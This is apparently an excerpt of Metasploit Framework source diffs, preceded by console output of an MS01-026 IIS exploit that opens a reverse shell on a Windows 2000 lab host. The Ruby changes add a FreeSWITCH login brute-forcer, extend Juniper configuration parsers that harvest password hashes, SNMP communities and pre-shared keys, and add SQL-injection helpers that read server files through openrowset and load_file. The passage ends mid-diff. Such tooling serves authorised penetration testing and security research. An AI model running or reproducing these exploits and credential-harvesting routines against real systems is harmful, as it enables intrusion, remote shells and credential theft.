|
||||
msf6 > use exploit/windows/iis/ms01_026_dbldecode
|
||||
[*] Using configured payload windows/shell/reverse_tcp
|
||||
msf6 exploit(windows/iis/ms01_026_dbldecode) > set rhosts 192.168.200.175
|
||||
rhosts => 192.168.200.175
|
||||
msf6 exploit(windows/iis/ms01_026_dbldecode) > check
|
||||
[+] 192.168.200.175:80 - The target is vulnerable. Found Windows directory name: winnt
|
||||
msf6 exploit(windows/iis/ms01_026_dbldecode) > set lhost 192.168.200.130
|
||||
lhost => 192.168.200.130
|
||||
msf6 exploit(windows/iis/ms01_026_dbldecode) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.200.130:4444
|
||||
[*] Using Windows directory "winnt"
|
||||
[*] Copying "\winnt\system32\cmd.exe" to the IIS scripts directory as "EcFJ.exe"...
|
||||
[*] Command Stager progress - 66.67% done (40/60 bytes)
|
||||
[*] Command Stager progress - 100.00% done (60/60 bytes)
|
||||
[*] Triggering payload "qQErEZeB.exe" via a direct request...
|
||||
[*] Encoded stage with x86/shikata_ga_nai
|
||||
[*] Sending encoded stage (267 bytes) to 192.168.200.175
|
||||
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.175:1090) at 2022-06-28 08:34:32 -0400
|
||||
[!] This exploit may require manual cleanup of 'qQErEZeB.exe' on the target
|
||||
|
||||
|
||||
Shell Banner:
|
||||
Microsoft Windows 2000 [Version 5.00.2195]
|
||||
-----
|
||||
|
||||
|
||||
c:\inetpub\scripts>hostname
|
||||
hostname
|
||||
win2k-srv-fr
|
||||
```
|
||||
@@ -0,0 +1,80 @@
|
||||
require 'metasploit/framework/login_scanner/base'
|
||||
require 'metasploit/framework/login_scanner/rex_socket'
|
||||
require 'metasploit/framework/tcp/client'
|
||||
|
||||
module Metasploit
|
||||
module Framework
|
||||
module LoginScanner
|
||||
|
||||
# This is the LoginScanner class for dealing with FreeSWITCH EventSocket.
|
||||
# It is responsible for taking a single target, and a list of credentials
|
||||
# and attempting them. It then saves the results.
|
||||
|
||||
class FreeswitchEventSocket
|
||||
include Metasploit::Framework::LoginScanner::Base
|
||||
include Metasploit::Framework::LoginScanner::RexSocket
|
||||
include Metasploit::Framework::Tcp::Client
|
||||
|
||||
DEFAULT_PORT = 8021
|
||||
LIKELY_PORTS = [ DEFAULT_PORT ]
|
||||
LIKELY_SERVICE_NAMES = [ 'freeswitch' ]
|
||||
PRIVATE_TYPES = [ :password ]
|
||||
REALM_KEY = nil
|
||||
|
||||
# This method attempts a single login with a single credential against the target
|
||||
# @param credential [Credential] The credential object to attempt to login with
|
||||
# @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
|
||||
def attempt_login(credential)
|
||||
result_options = {
|
||||
credential: credential,
|
||||
status: Metasploit::Model::Login::Status::INCORRECT,
|
||||
host: host,
|
||||
port: port,
|
||||
protocol: 'tcp',
|
||||
service_name: 'freeswitch'
|
||||
}
|
||||
|
||||
disconnect if self.sock
|
||||
|
||||
begin
|
||||
connect
|
||||
select([sock], nil, nil, 0.4)
|
||||
|
||||
sock.get_once
|
||||
sock.put("auth #{credential.private}\n\n")
|
||||
|
||||
/Reply-Text: (?<reply>.*)/ =~ sock.get_once
|
||||
result_options[:proof] = reply
|
||||
|
||||
# Invalid password - ( -ERR invalid\n\n )
|
||||
# Valid password - ( +OK accepted\n\n )
|
||||
|
||||
if result_options[:proof]&.include?('-ERR invalid')
|
||||
result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
|
||||
elsif result_options[:proof]&.include?('+OK accepted')
|
||||
result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
|
||||
end
|
||||
|
||||
rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE, Rex::StreamClosedError => e
|
||||
result_options.merge!(
|
||||
proof: e.message,
|
||||
status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
|
||||
)
|
||||
end
|
||||
disconnect if self.sock
|
||||
::Metasploit::Framework::LoginScanner::Result.new(result_options)
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
# (see Base#set_sane_defaults)
|
||||
def set_sane_defaults
|
||||
self.connection_timeout ||= 10
|
||||
self.port ||= DEFAULT_PORT
|
||||
self.max_send_size ||= 0
|
||||
self.send_delay ||= 0
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -30,7 +30,7 @@ module Metasploit
|
||||
end
|
||||
end
|
||||
|
||||
VERSION = "6.2.2"
|
||||
VERSION = "6.2.6"
|
||||
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
|
||||
PRERELEASE = 'dev'
|
||||
HASH = get_hash
|
||||
|
||||
+259
-238
@@ -3,257 +3,278 @@
|
||||
require 'metasploit/framework/hashes/identify'
|
||||
|
||||
module Msf
|
||||
###
|
||||
#
|
||||
# This module provides methods for working with Juniper equipment
|
||||
#
|
||||
###
|
||||
module Auxiliary::Juniper
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
###
|
||||
#
|
||||
# This module provides methods for working with Juniper equipment
|
||||
#
|
||||
###
|
||||
module Auxiliary::Juniper
|
||||
include Msf::Auxiliary::Report
|
||||
def juniper_screenos_config_eater(thost, tport, config)
|
||||
# this is for the netscreen OS, which came on SSG (ie SSG5) type devices.
|
||||
# It is similar to cisco, however it doesn't always put all fields we care
|
||||
# about on one line.
|
||||
# Docs: snmp -> https://kb.juniper.net/InfoCenter/index?page=content&id=KB4223
|
||||
# ppp -> https://kb.juniper.net/InfoCenter/index?page=content&id=KB22592
|
||||
# ike -> https://kb.juniper.net/KB4147
|
||||
# https://github.com/h00die/MSF-Testing-Scripts/blob/master/juniper_strings.py#L171
|
||||
|
||||
def juniper_screenos_config_eater(thost, tport, config)
|
||||
# this is for the netscreen OS, which came on SSG (ie SSG5) type devices.
|
||||
# It is similar to cisco, however it doesn't always put all fields we care
|
||||
# about on one line.
|
||||
# Docs: snmp -> https://kb.juniper.net/InfoCenter/index?page=content&id=KB4223
|
||||
# ppp -> https://kb.juniper.net/InfoCenter/index?page=content&id=KB22592
|
||||
# ike -> https://kb.juniper.net/KB4147
|
||||
# https://github.com/h00die/MSF-Testing-Scripts/blob/master/juniper_strings.py#L171
|
||||
report_host({
|
||||
host: thost,
|
||||
os_name: 'Juniper ScreenOS'
|
||||
})
|
||||
|
||||
report_host({
|
||||
:host => thost,
|
||||
:os_name => 'Juniper ScreenOS'
|
||||
})
|
||||
|
||||
if framework.db.active
|
||||
credential_data = {
|
||||
address: thost,
|
||||
port: tport,
|
||||
protocol: 'tcp',
|
||||
workspace_id: myworkspace_id,
|
||||
origin_type: :service,
|
||||
service_name: '',
|
||||
private_type: :nonreplayable_hash,
|
||||
module_fullname: self.fullname,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
end
|
||||
|
||||
store_loot('juniper.netscreen.config', 'text/plain', thost, config.strip, 'config.txt', 'Juniper Netscreen Configuration')
|
||||
|
||||
# admin name and password
|
||||
# Example lines:
|
||||
# set admin name "netscreen"
|
||||
# set admin password "nKVUM2rwMUzPcrkG5sWIHdCtqkAibn"
|
||||
config.scan(/set admin name "(?<admin_name>[a-z0-9]+)".+set admin password "(?<admin_password_hash>[a-z0-9]+)"/mi).each do |result|
|
||||
admin_name = result[0].strip
|
||||
admin_hash = result[1].strip
|
||||
print_good("Admin user #{admin_name} found with password hash #{admin_hash}")
|
||||
next unless framework.db.active
|
||||
cred = credential_data.dup
|
||||
cred[:username] = admin_name
|
||||
cred[:private_data] = admin_hash
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
|
||||
# user account
|
||||
# Example lines:
|
||||
# set user "testuser" uid 1
|
||||
# set user "testuser" type auth
|
||||
# set user "testuser" hash-password "02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE="
|
||||
# set user "testuser" enable
|
||||
config.scan(/set user "(?<user_name>[a-z0-9]+)" uid (?<user_uid>\d+).+set user "\k<user_name>" type (?<user_type>\w+).+set user "\k<user_name>" hash-password "(?<user_hash>[0-9a-z=]{38})".+set user "\k<user_name>" (?<user_enable>enable).+/mi).each do |result|
|
||||
user_name = result[0].strip
|
||||
user_uid = result[1].strip
|
||||
user_enable = result[4].strip
|
||||
user_hash = result[3].strip
|
||||
print_good("User #{user_uid} named #{user_name} found with password hash #{user_hash}. Enable permission: #{user_enable}")
|
||||
next unless framework.db.active
|
||||
cred = credential_data.dup
|
||||
cred[:username] = user_name
|
||||
cred[:jtr_format] = 'sha1'
|
||||
cred[:private_data] = user_hash
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
|
||||
# snmp
|
||||
# Example lines:
|
||||
# set snmp community "sales" Read-Write Trap-on traffic version v1
|
||||
config.scan(/set snmp community "(?<snmp_community>[a-z0-9]+)" (?<snmp_permissions>Read-Write|Read-Only)/i).each do |result|
|
||||
snmp_community = result[0].strip
|
||||
snmp_permissions = result[1].strip
|
||||
print_good("SNMP community #{snmp_community} with permissions #{snmp_permissions}")
|
||||
next unless framework.db.active
|
||||
cred = credential_data.dup
|
||||
if snmp_permissions.downcase == 'read-write'
|
||||
cred[:access_level] = 'RW'
|
||||
else
|
||||
cred[:access_level] = 'RO'
|
||||
end
|
||||
cred[:protocol] = 'udp'
|
||||
cred[:port] = 161
|
||||
cred[:service_name] = 'snmp'
|
||||
cred[:private_data] = snmp_community
|
||||
cred[:private_type] = :password
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
|
||||
# ppp
|
||||
# Example lines:
|
||||
# setppp profile "ISP" auth type pap
|
||||
# setppp profile "ISP" auth local-name "username"
|
||||
# setppp profile "ISP" auth secret "fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA=="
|
||||
config.scan(/setppp profile "(?<ppp_name>[a-z0-9]+)" auth type (?<ppp_authtype>[a-z]+).+setppp profile "\k<ppp_name>" auth local-name "(?<ppp_username>[a-z0-9]+)".+setppp profile "\k<ppp_name>" auth secret "(?<ppp_hash>.+)"/mi).each do |result|
|
||||
ppp_name = result[0].strip
|
||||
ppp_username = result[2].strip
|
||||
ppp_hash = result[3].strip
|
||||
ppp_authtype = result[1].strip
|
||||
print_good("PPTP Profile #{ppp_name} with username #{ppp_username} hash #{ppp_hash} via #{ppp_authtype}")
|
||||
next unless framework.db.active
|
||||
cred = credential_data.dup
|
||||
cred[:username] = ppp_username
|
||||
cred[:private_data] = ppp_hash
|
||||
cred[:service_name] = 'pptp'
|
||||
cred[:port] = 1723
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
|
||||
# ike
|
||||
# Example lines:
|
||||
# set ike gateway "To-Cisco" address 2.2.2.1 Main outgoing-interface "ethernet1" preshare "netscreen" proposal "pre-g2-des-sha"
|
||||
config.scan(/set ike gateway "(?<ike_name>.+)" address (?<ike_address>[0-9.]+) Main outgoing-interface ".+" preshare "(?<ike_password>.+)" proposal "(?<ike_method>.+)"/i).each do |result|
|
||||
ike_name = result[0].strip
|
||||
ike_address = result[1].strip
|
||||
ike_password = result[2].strip
|
||||
ike_method = result[3].strip
|
||||
print_good("IKE Profile #{ike_name} to #{ike_address} with password #{ike_password} via #{ike_method}")
|
||||
next unless framework.db.active
|
||||
cred = credential_data.dup
|
||||
cred[:private_data] = ike_password
|
||||
cred[:private_type] = :password
|
||||
cred[:service_name] = 'ike'
|
||||
cred[:port] = 500
|
||||
cred[:address] = ike_address
|
||||
cred[:protocol] = 'udp'
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
||||
def juniper_junos_config_eater(thost, tport, config)
|
||||
|
||||
report_host({
|
||||
:host => thost,
|
||||
:os_name => 'Juniper JunOS'
|
||||
})
|
||||
|
||||
|
||||
if framework.db.active
|
||||
credential_data = {
|
||||
address: thost,
|
||||
port: tport,
|
||||
protocol: 'tcp',
|
||||
workspace_id: myworkspace_id,
|
||||
origin_type: :service,
|
||||
private_type: :nonreplayable_hash,
|
||||
service_name: '',
|
||||
module_fullname: self.fullname,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
end
|
||||
|
||||
store_loot('juniper.junos.config', 'text/plain', thost, config.strip, 'config.txt', 'Juniper JunOS Configuration')
|
||||
|
||||
# we'll take out the pretty format so its easier to regex
|
||||
config = config.split("\n").join('')
|
||||
|
||||
# Example:
|
||||
#system {
|
||||
# root-authentication {
|
||||
# encrypted-password "$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E."; ## SECRET-DATA
|
||||
# }
|
||||
#}
|
||||
if /root-authentication[\s]+\{[\s]+encrypted-password "(?<root_hash>[^"]+)";/i =~ config
|
||||
root_hash = root_hash.strip
|
||||
jtr_format = identify_hash root_hash
|
||||
|
||||
print_good("root password hash: #{root_hash}")
|
||||
if framework.db.active
|
||||
credential_data = {
|
||||
address: thost,
|
||||
port: tport,
|
||||
protocol: 'tcp',
|
||||
workspace_id: myworkspace_id,
|
||||
origin_type: :service,
|
||||
service_name: '',
|
||||
private_type: :nonreplayable_hash,
|
||||
module_fullname: fullname,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
end
|
||||
|
||||
store_loot('juniper.netscreen.config', 'text/plain', thost, config.strip, 'config.txt', 'Juniper Netscreen Configuration')
|
||||
|
||||
# admin name and password
|
||||
# Example lines:
|
||||
# set admin name "netscreen"
|
||||
# set admin password "nKVUM2rwMUzPcrkG5sWIHdCtqkAibn"
|
||||
config.scan(/set admin name "(?<admin_name>[a-z0-9]+)".+set admin password "(?<admin_password_hash>[a-z0-9]+)"/mi).each do |result|
|
||||
admin_name = result[0].strip
|
||||
admin_hash = result[1].strip
|
||||
print_good("Admin user #{admin_name} found with password hash #{admin_hash}")
|
||||
next unless framework.db.active
|
||||
|
||||
cred = credential_data.dup
|
||||
cred[:username] = 'root'
|
||||
cred[:jtr_format] = jtr_format
|
||||
cred[:private_data] = root_hash
|
||||
cred[:username] = admin_name
|
||||
cred[:private_data] = admin_hash
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
|
||||
# user account
|
||||
# Example lines:
|
||||
# set user "testuser" uid 1
|
||||
# set user "testuser" type auth
|
||||
# set user "testuser" hash-password "02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE="
|
||||
# set user "testuser" enable
|
||||
config.scan(/set user "(?<user_name>[a-z0-9]+)" uid (?<user_uid>\d+).+set user "\k<user_name>" type (?<user_type>\w+).+set user "\k<user_name>" hash-password "(?<user_hash>[0-9a-z=]{38})".+set user "\k<user_name>" (?<user_enable>enable).+/mi).each do |result|
|
||||
user_name = result[0].strip
|
||||
user_uid = result[1].strip
|
||||
user_enable = result[4].strip
|
||||
user_hash = result[3].strip
|
||||
print_good("User #{user_uid} named #{user_name} found with password hash #{user_hash}. Enable permission: #{user_enable}")
|
||||
next unless framework.db.active
|
||||
|
||||
cred = credential_data.dup
|
||||
cred[:username] = user_name
|
||||
cred[:jtr_format] = 'sha1'
|
||||
cred[:private_data] = user_hash
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
|
||||
# snmp
|
||||
# Example lines:
|
||||
# set snmp community "sales" Read-Write Trap-on traffic version v1
|
||||
config.scan(/set snmp community "(?<snmp_community>[a-z0-9]+)" (?<snmp_permissions>Read-Write|Read-Only)/i).each do |result|
|
||||
snmp_community = result[0].strip
|
||||
snmp_permissions = result[1].strip
|
||||
print_good("SNMP community #{snmp_community} with permissions #{snmp_permissions}")
|
||||
next unless framework.db.active
|
||||
|
||||
cred = credential_data.dup
|
||||
if snmp_permissions.downcase == 'read-write'
|
||||
cred[:access_level] = 'RW'
|
||||
else
|
||||
cred[:access_level] = 'RO'
|
||||
end
|
||||
cred[:protocol] = 'udp'
|
||||
cred[:port] = 161
|
||||
cred[:service_name] = 'snmp'
|
||||
cred[:private_data] = snmp_community
|
||||
cred[:private_type] = :password
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
|
||||
# ppp
|
||||
# Example lines:
|
||||
# setppp profile "ISP" auth type pap
|
||||
# setppp profile "ISP" auth local-name "username"
|
||||
# setppp profile "ISP" auth secret "fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA=="
|
||||
config.scan(/setppp profile "(?<ppp_name>[a-z0-9]+)" auth type (?<ppp_authtype>[a-z]+).+setppp profile "\k<ppp_name>" auth local-name "(?<ppp_username>[a-z0-9]+)".+setppp profile "\k<ppp_name>" auth secret "(?<ppp_hash>.+)"/mi).each do |result|
|
||||
ppp_name = result[0].strip
|
||||
ppp_username = result[2].strip
|
||||
ppp_hash = result[3].strip
|
||||
ppp_authtype = result[1].strip
|
||||
print_good("PPTP Profile #{ppp_name} with username #{ppp_username} hash #{ppp_hash} via #{ppp_authtype}")
|
||||
next unless framework.db.active
|
||||
|
||||
cred = credential_data.dup
|
||||
cred[:username] = ppp_username
|
||||
cred[:private_data] = ppp_hash
|
||||
cred[:service_name] = 'pptp'
|
||||
cred[:port] = 1723
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
|
||||
# ike
|
||||
# Example lines:
|
||||
# set ike gateway "To-Cisco" address 2.2.2.1 Main outgoing-interface "ethernet1" preshare "netscreen" proposal "pre-g2-des-sha"
|
||||
config.scan(/set ike gateway "(?<ike_name>.+)" address (?<ike_address>[0-9.]+) Main outgoing-interface ".+" preshare "(?<ike_password>.+)" proposal "(?<ike_method>.+)"/i).each do |result|
|
||||
ike_name = result[0].strip
|
||||
ike_address = result[1].strip
|
||||
ike_password = result[2].strip
|
||||
ike_method = result[3].strip
|
||||
print_good("IKE Profile #{ike_name} to #{ike_address} with password #{ike_password} via #{ike_method}")
|
||||
next unless framework.db.active
|
||||
|
||||
cred = credential_data.dup
|
||||
cred[:private_data] = ike_password
|
||||
cred[:private_type] = :password
|
||||
cred[:service_name] = 'ike'
|
||||
cred[:port] = 500
|
||||
cred[:address] = ike_address
|
||||
cred[:protocol] = 'udp'
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
end
|
||||
|
||||
# access privileges https://kb.juniper.net/InfoCenter/index?page=content&id=KB10902
|
||||
config.scan(/user (?<user_name>[^\s]+) {[\s]+ uid (?<user_uid>[\d]+);[\s]+ class (?<user_permission>super-user|operator|read-only|unauthorized);[\s]+ authentication {[\s]+encrypted-password "(?<user_hash>[^\s]+)";/i).each do |result|
|
||||
user_name = result[0].strip
|
||||
user_uid = result[1].strip
|
||||
user_permission = result[2].strip
|
||||
user_hash = result[3].strip
|
||||
jtr_format = identify_hash user_hash
|
||||
def juniper_junos_config_eater(thost, tport, config)
|
||||
report_host({
|
||||
host: thost,
|
||||
os_name: 'Juniper JunOS'
|
||||
})
|
||||
|
||||
print_good("User #{user_uid} named #{user_name} in group #{user_permission} found with password hash #{user_hash}.")
|
||||
next unless framework.db.active
|
||||
cred = credential_data.dup
|
||||
cred[:username] = user_name
|
||||
cred[:jtr_format] = jtr_format
|
||||
cred[:private_data] = user_hash
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
|
||||
# https://supportf5.com/csp/article/K6449 special characters allowed in snmp community strings
|
||||
config.scan(/community "?(?<snmp_community>[\w\d\s\(\)\.\*\/-:_\?=@\,&%\$]+)"? {(\s+view [\w\-]+;)?\s+authorization read-(?<snmp_permission>only|write)/i).each do |result|
|
||||
snmp_community = result[0].strip
|
||||
snmp_permissions = result[1].strip
|
||||
print_good("SNMP community #{snmp_community} with permissions read-#{snmp_permissions}")
|
||||
next unless framework.db.active
|
||||
cred = credential_data.dup
|
||||
if snmp_permissions.downcase == 'write'
|
||||
cred[:access_level] = 'RW'
|
||||
else
|
||||
cred[:access_level] = 'RO'
|
||||
if framework.db.active
|
||||
credential_data = {
|
||||
address: thost,
|
||||
port: tport,
|
||||
protocol: 'tcp',
|
||||
workspace_id: myworkspace_id,
|
||||
origin_type: :service,
|
||||
private_type: :nonreplayable_hash,
|
||||
service_name: '',
|
||||
module_fullname: fullname,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
end
|
||||
cred[:protocol] = 'udp'
|
||||
cred[:port] = 161
|
||||
cred[:private_data] = snmp_community
|
||||
cred[:private_type] = :password
|
||||
cred[:service_name] = 'snmp'
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
|
||||
config.scan(/radius-server \{[\s]+(?<radius_server>[0-9\.]{7,15}) secret "(?<radius_hash>[^"]+)";/i).each do |result|
|
||||
radius_hash = result[1].strip
|
||||
radius_server = result[0].strip
|
||||
print_good("radius server #{radius_server} password hash: #{radius_hash}")
|
||||
next unless framework.db.active
|
||||
cred = credential_data.dup
|
||||
cred[:address] = radius_server
|
||||
cred[:port] = 1812
|
||||
cred[:protocol] = 'udp'
|
||||
cred[:private_data] = radius_hash
|
||||
cred[:service_name] = 'radius'
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
store_loot('juniper.junos.config', 'text/plain', thost, config.strip, 'config.txt', 'Juniper JunOS Configuration')
|
||||
|
||||
config.scan(/pap {[\s]+local-name "(?<ppp_username>.+)";[\s]+local-password "(?<ppp_hash>[^"]+)";/i).each do |result|
|
||||
ppp_username = result[0].strip
|
||||
ppp_hash = result[1].strip
|
||||
print_good("PPTP username #{ppp_username} hash #{ppp_hash} via PAP")
|
||||
next unless framework.db.active
|
||||
cred = credential_data.dup
|
||||
cred[:username] = ppp_username
|
||||
cred[:private_data] = ppp_hash
|
||||
cred[:service_name] = 'pptp'
|
||||
cred[:port] = 1723
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
# we'll take out the pretty format so its easier to regex
|
||||
config = config.split("\n").join('')
|
||||
|
||||
# Example:
|
||||
# system {
|
||||
# root-authentication {
|
||||
# encrypted-password "$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E."; ## SECRET-DATA
|
||||
# }
|
||||
# }
|
||||
if /root-authentication\s+\{\s+encrypted-password "(?<root_hash>[^"]+)";/i =~ config
|
||||
root_hash = root_hash.strip
|
||||
jtr_format = identify_hash root_hash
|
||||
|
||||
print_good("root password hash: #{root_hash}")
|
||||
if framework.db.active
|
||||
cred = credential_data.dup
|
||||
cred[:username] = 'root'
|
||||
cred[:jtr_format] = jtr_format
|
||||
cred[:private_data] = root_hash
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
end
|
||||
|
||||
# access privileges https://kb.juniper.net/InfoCenter/index?page=content&id=KB10902
|
||||
config.scan(/user (?<user_name>[^\s]+) {(\s+ full-name (?<fullname>[^;]+);)?\s+ uid (?<user_uid>\d+);\s+ class (?<user_permission>super-user|operator|read-only|unauthorized|[^;]+);\s+ authentication {\s+encrypted-password "(?<user_hash>[^\s]+)";/i).each do |result|
|
||||
user_name = result[0].strip
|
||||
user_uid = result[2].strip
|
||||
user_permission = result[3].strip
|
||||
user_hash = result[4].strip
|
||||
jtr_format = identify_hash user_hash
|
||||
|
||||
print_good("User #{user_uid} named #{user_name} in group #{user_permission} found with password hash #{user_hash}.")
|
||||
next unless framework.db.active
|
||||
|
||||
cred = credential_data.dup
|
||||
cred[:username] = user_name
|
||||
cred[:jtr_format] = jtr_format
|
||||
cred[:private_data] = user_hash
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
|
||||
# https://supportf5.com/csp/article/K6449 special characters allowed in snmp community strings
|
||||
config.scan(%r{community "?(?<snmp_community>[\w\d\s().*/-:_?=@,&%$+!]+)"? \{(\s+view [\w\-]+;)?\s+authorization read-(?<snmp_permission>only|write)}i).each do |result|
|
||||
snmp_community = result[0].strip
|
||||
snmp_permissions = result[1].strip
|
||||
print_good("SNMP community #{snmp_community} with permissions read-#{snmp_permissions}")
|
||||
next unless framework.db.active
|
||||
|
||||
cred = credential_data.dup
|
||||
if snmp_permissions.downcase == 'write'
|
||||
cred[:access_level] = 'RW'
|
||||
else
|
||||
cred[:access_level] = 'RO'
|
||||
end
|
||||
cred[:protocol] = 'udp'
|
||||
cred[:port] = 161
|
||||
cred[:private_data] = snmp_community
|
||||
cred[:private_type] = :password
|
||||
cred[:service_name] = 'snmp'
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
|
||||
# radius-server
|
||||
config.scan(/\s*radius-server \{([^}]+)\}/i).each do |result_block|
|
||||
result_block[0].strip.scan(/(?<radius_server>[0-9.]{7,15}) secret "(?<radius_hash>[^"]+)";/i).each do |result|
|
||||
radius_hash = result[1].strip
|
||||
radius_server = result[0].strip
|
||||
print_good("radius server #{radius_server} password hash: #{radius_hash}")
|
||||
next unless framework.db.active
|
||||
|
||||
cred = credential_data.dup
|
||||
cred[:address] = radius_server
|
||||
cred[:port] = 1812
|
||||
cred[:protocol] = 'udp'
|
||||
cred[:private_data] = radius_hash
|
||||
cred[:service_name] = 'radius'
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
end
|
||||
|
||||
# tacplus-server
|
||||
config.scan(/\s*tacplus-server \{([^}]+)\}/i).each do |result_block|
|
||||
result_block[0].strip.scan(/(?<tacplus_server>[0-9.]{7,15}) secret "(?<hash>[^"]+)";/i).each do |result|
|
||||
ip = result[0].strip
|
||||
hash = result[1].strip
|
||||
jtr_format = identify_hash hash
|
||||
print_good("tacplus server #{ip} with password hash #{hash}")
|
||||
next unless framework.db.active
|
||||
|
||||
cred = credential_data.dup
|
||||
cred[:jtr_format] = jtr_format
|
||||
cred[:private_data] = hash
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
end
|
||||
|
||||
config.scan(/pap {\s+local-name "(?<ppp_username>.+)";\s+local-password "(?<ppp_hash>[^"]+)";/i).each do |result|
|
||||
ppp_username = result[0].strip
|
||||
ppp_hash = result[1].strip
|
||||
print_good("PPTP username #{ppp_username} hash #{ppp_hash} via PAP")
|
||||
next unless framework.db.active
|
||||
|
||||
cred = credential_data.dup
|
||||
cred[:username] = ppp_username
|
||||
cred[:private_data] = ppp_hash
|
||||
cred[:service_name] = 'pptp'
|
||||
cred[:port] = 1723
|
||||
create_credential_and_login(cred)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
@@ -67,6 +67,7 @@ module Exploit::CmdStager
|
||||
OptEnum.new('CMDSTAGER::FLAVOR', [false, 'The CMD Stager to use.', 'auto', flavors]),
|
||||
OptString.new('CMDSTAGER::DECODER', [false, 'The decoder stub to use.']),
|
||||
OptString.new('CMDSTAGER::TEMP', [false, 'Writable directory for staged files']),
|
||||
OptString.new('CMDSTAGER::URIPATH', [false, 'Payload URI path for supported stagers']),
|
||||
OptBool.new('CMDSTAGER::SSL', [false, 'Use SSL/TLS for supported stagers', false])
|
||||
], self.class)
|
||||
end
|
||||
@@ -147,6 +148,7 @@ module Exploit::CmdStager
|
||||
|
||||
if stager_instance.respond_to?(:http?) && stager_instance.http?
|
||||
opts[:ssl] = datastore['CMDSTAGER::SSL'] unless opts.key?(:ssl)
|
||||
opts['Path'] = datastore['CMDSTAGER::URIPATH'] unless datastore['CMDSTAGER::URIPATH'].blank?
|
||||
opts[:payload_uri] = start_service(opts)
|
||||
end
|
||||
|
||||
|
||||
@@ -196,6 +196,24 @@ module Msf::Exploit::SQLi::Mssqli
|
||||
run_sql("select '#{data}' into dumpfile '#{fpath}'")
|
||||
end
|
||||
|
||||
#
|
||||
# Attempt reading from a file on the filesystem
|
||||
# @param fpath [String] The path of the file to read
|
||||
# @return [String] The content of the file if reading was successful
|
||||
#
|
||||
def read_from_file(fpath, binary=false)
|
||||
alias1 = Rex::Text.rand_text_alpha(1) + Rex::Text.rand_text_alphanumeric(5..11)
|
||||
expr = @encoder ? @encoder[:encode].sub(/\^DATA\^/, 'BulkColumn') : 'BulkColumn'
|
||||
output = if @truncation_length
|
||||
truncated_query("select substring(#{expr},^OFFSET^,#{@truncation_length}) " \
|
||||
"from openrowset(bulk N'#{fpath}',SINGLE_CLOB) as #{alias1}")
|
||||
else
|
||||
run_sql("select #{expr} from openrowset(bulk N'#{fpath}',SINGLE_CLOB) as #{alias1}")
|
||||
end
|
||||
output = @encoder[:decode].call(output) if @encoder
|
||||
output
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
#
|
||||
|
||||
@@ -13,7 +13,7 @@ module Msf::Exploit::SQLi::MySQLi
|
||||
#
|
||||
ENCODERS = {
|
||||
base64: {
|
||||
encode: 'to_base64(^DATA^)',
|
||||
encode: 'replace(to_base64(^DATA^), \'\\n\', \'\')',
|
||||
decode: proc { |data| Base64.decode64(data) }
|
||||
},
|
||||
hex: {
|
||||
@@ -217,10 +217,11 @@ module Msf::Exploit::SQLi::MySQLi
|
||||
#
|
||||
# Attempt reading from a file on the filesystem, requires having the FILE privilege
|
||||
# @param fpath [String] The path of the file to read
|
||||
# @param binary [Boolean] Whether the target file is a binary one or not
|
||||
# @return [String] The content of the file if reading was successful
|
||||
#
|
||||
def read_from_file(fpath)
|
||||
run_sql("select load_file('#{fpath}')")
|
||||
def read_from_file(fpath, binary=false)
|
||||
call_function("load_file('#{fpath}')")
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
@@ -13,7 +13,7 @@ module Msf::Exploit::SQLi::PostgreSQLi
|
||||
#
|
||||
ENCODERS = {
|
||||
base64: {
|
||||
encode: 'encode(^DATA^::bytea, \'base64\')',
|
||||
encode: 'translate(encode(^DATA^::bytea, \'base64\'), E\'\n\',\'\')',
|
||||
decode: proc { |data| Base64.decode64(data) }
|
||||
},
|
||||
hex: {
|
||||
@@ -206,6 +206,22 @@ module Msf::Exploit::SQLi::PostgreSQLi
|
||||
raw_run_sql("copy (select '#{data}') to '#{fname}'")
|
||||
end
|
||||
|
||||
#
|
||||
# Attempt reading from a file on the filesystem
|
||||
# @param fpath [String] The path of the file to read
|
||||
# @param binary [String] Whether the target file should be considered a binary one (defaults to false)
|
||||
# @return [String] The content of the file if reading was successful
|
||||
#
|
